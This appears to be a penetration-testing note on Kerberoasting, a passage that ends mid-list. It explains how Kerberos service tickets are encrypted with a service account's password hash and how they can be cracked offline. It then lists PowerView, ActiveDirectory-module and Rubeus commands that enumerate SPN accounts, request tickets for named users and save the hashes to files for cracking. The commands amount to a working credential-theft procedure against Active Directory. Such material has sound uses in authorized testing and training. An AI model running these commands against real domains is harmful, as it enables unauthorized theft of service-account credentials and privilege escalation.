Offline cracking of service account passwords. The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack. Service accounts are many times ignored (passwords are rarely changed) and have privileged access. Password hashes of service accounts could be used to create Silver tickets.
The attack occurs in step 4: a TGS is requested from which the password hash of the target service account (with Rubeus
/GetUserSPNs.py
) is extracted and cracked offline. The requested TGS is then not presented to the application server (AP-REQ
) but is saved and cracked offline.
<aside> ⚠️
The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be request for as long as the service's SAN (sAMAccountName
) is known. (swarm.ptsecurity.com)
N.B: Kerberos can deliver service tickets even if the service has no SPN at all, but then the service's SAN must end with $
, and in this case it's hard to know for sure if the service's password is defined by a human. Kerberoast attacks usually target user accounts with at least one SPN (servicePrincipalName
) since they probably have human-defined passwords (sources: Twitter and [MS-KILE] section 3.3.5.1.1).
</aside>
Find user accounts used as Service Accounts
Get-DomainUser -SPN #PowerView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#ActiveDirectory module
Use Rubeus to list Kerberoast users and stats (ONLY FROM AD JOINED MACHINE)
.\\Rubeus.exe kerberoast
.\\Rubeus.exe kerberoast /stats
Use Rubeus to request a TGS and save it to a file:
.\\Rubeus.exe kerberoast /user:svctest /simple
.\\Rubeus.exe kerberoast /user:svctest /outfile:svctest.txt
Kerberoast all possible account: